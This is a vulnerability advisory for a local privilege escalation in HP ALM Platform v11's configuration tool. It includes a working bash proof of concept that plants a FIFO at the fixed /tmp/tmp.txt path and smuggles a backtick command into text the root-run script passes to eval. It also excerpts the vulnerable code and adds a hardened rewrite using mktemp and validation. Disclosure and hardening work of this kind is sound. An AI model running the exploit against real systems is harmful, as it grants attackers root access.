================
Privilege escalation vulnerability in HP Application Lifecycle Management (ALM) Platform v11
Author: 0a29406d9794e4f9b30b3c5d6702c708
twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940
================
Description:
================
The HP Application Lifecycle Management configuration tool contains a vulnerable function 'GetInstalledPackages' which is called when upgrading or uninstalling HP ALM. The AIX, HP-UX and Solaris versions all write to and parse the predictable path /tmp/tmp.txt in the same insecure manner.
================
Timeline:
================
30 November 2011 - Reported to HP. Ignored.
08 December 2011 - Public disclosure
================
Exploit:
================
#!/bin/bash
# Simple PoC : Run as user, when vulnerable function is called
# /home/user/binary_to_run_as_root is run as root.
cat > file << EOF
Child Components
0a29406d9794e4f9b30b3c5d6702c708
\`/home/user/binary_to_run_as_root\`
EOF
mkfifo /tmp/tmp.txt    # set trap
cat /tmp/tmp.txt       # blocks for victim
while [ -e /tmp/tmp.txt ]; do
    cat file > /tmp/tmp.txt
    sleep 2
done
rm file
--
================
Details:
================
e.g. from GetInstalledPackages in SunOS_lib.sh (Solaris):
---
prodreg info -u $PRODUCT_NAME > /tmp/tmp.txt
<snip>
firstRow=`awk '/Child Components/ { print NR;}' /tmp/tmp.txt`
<snip>
firstRow=`expr $firstRow + 3`
lastRow=`awk 'END { print NR }' /tmp/tmp.txt`
<snip>
eval \child$numOfPackages=`awk '{ if ( NR == pattern ) { print $1 } }' pattern=$firstRow /tmp/tmp.txt`
<snip>
rm /tmp/tmp.txt
---
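The snippet above combines two defects: a fixed, world-writable scratch path in /tmp (which lets any local user pre-create a FIFO or symlink there, as the PoC does) and an eval over text read back from that file (which turns any backtick or $(...) in the parsed field into a command run as root). The following is an added, defender-side rewrite of that pattern in portable sh; it is not HP's code and not part of the advisory. fake_prodreg_info is a constructed stand-in for the output of prodreg info -u, laid out so that package names begin three rows after the "Child Components" header, matching the awk offsets shown in the Details section; mktemp is assumed to be available.

```shell
#!/bin/sh
# Added example (not HP's code): hardened version of the GetInstalledPackages
# scratch-file pattern. Fix 1: the file comes from mktemp, so its name is
# unpredictable and it is created fresh (no pre-planted FIFO or symlink can be
# reused). Fix 2: parsed fields are validated and printed, never passed to eval.

# Constructed stand-in for `prodreg info -u $PRODUCT_NAME` (hypothetical layout:
# names start 3 rows below the "Child Components" header, as in the advisory).
# The fourth entry is a deliberately hostile line of the kind the PoC plants.
fake_prodreg_info() {
    printf '%s\n' \
        'Name:            HP ALM Platform' \
        'Child Components' \
        '' \
        'Name             Version' \
        'ALMCore          11.0' \
        'ALMRepository    11.0' \
        '`/home/user/binary_to_run_as_root`' \
        'ALMSiteAdmin     11.0'
}

# Accept only characters a package identifier legitimately uses. Backticks, $,
# ;, quotes, spaces and slashes are rejected instead of being interpreted.
is_safe_name() {
    case "$1" in
        ''|*[!A-Za-z0-9._-]*) return 1 ;;
        *) return 0 ;;
    esac
}

# Usage: get_child_packages <command-producing-listing>
# Prints validated child package names, one per line. Rejected lines go to
# stderr. Exit status = number of rejected lines (0 = listing was clean).
get_child_packages() {
    tmp=$(mktemp) || return 99          # private file, mode 0600, unguessable name
    "$1" > "$tmp"
    first=$(awk '/Child Components/ { print NR; exit }' "$tmp")
    if [ -z "$first" ]; then
        rm -f "$tmp"
        return 0
    fi
    first=$((first + 3))
    # Plain field extraction, same as the original awk, but the result is data.
    candidates=$(awk -v start="$first" 'NR >= start && NF > 0 { print $1 }' "$tmp")
    rm -f "$tmp"

    rejected=0
    # Here-document keeps the loop in the current shell, so the counter survives.
    while IFS= read -r name; do
        [ -n "$name" ] || continue
        if is_safe_name "$name"; then
            printf '%s\n' "$name"
        else
            printf 'rejected unsafe package name: %s\n' "$name" >&2
            rejected=$((rejected + 1))
        fi
    done <<EOF
$candidates
EOF
    return "$rejected"
}

# Demonstration on the constructed listing: three names pass, one is rejected.
if get_child_packages fake_prodreg_info; then
    echo "listing clean"
else
    echo "rejected $? line(s); aborting upgrade step"
fi
```

Two design choices are worth noting. The temp file is created by mktemp rather than by a fixed name under /tmp, which is what removes the race the PoC exploits; a caller that must keep a fixed path should at least use a directory only root can write to. And the dynamically named variables (child1, child2, ...) that forced the original to use eval are replaced by a newline-separated list on stdout, so even a field that does slip past validation is only ever printed, never executed.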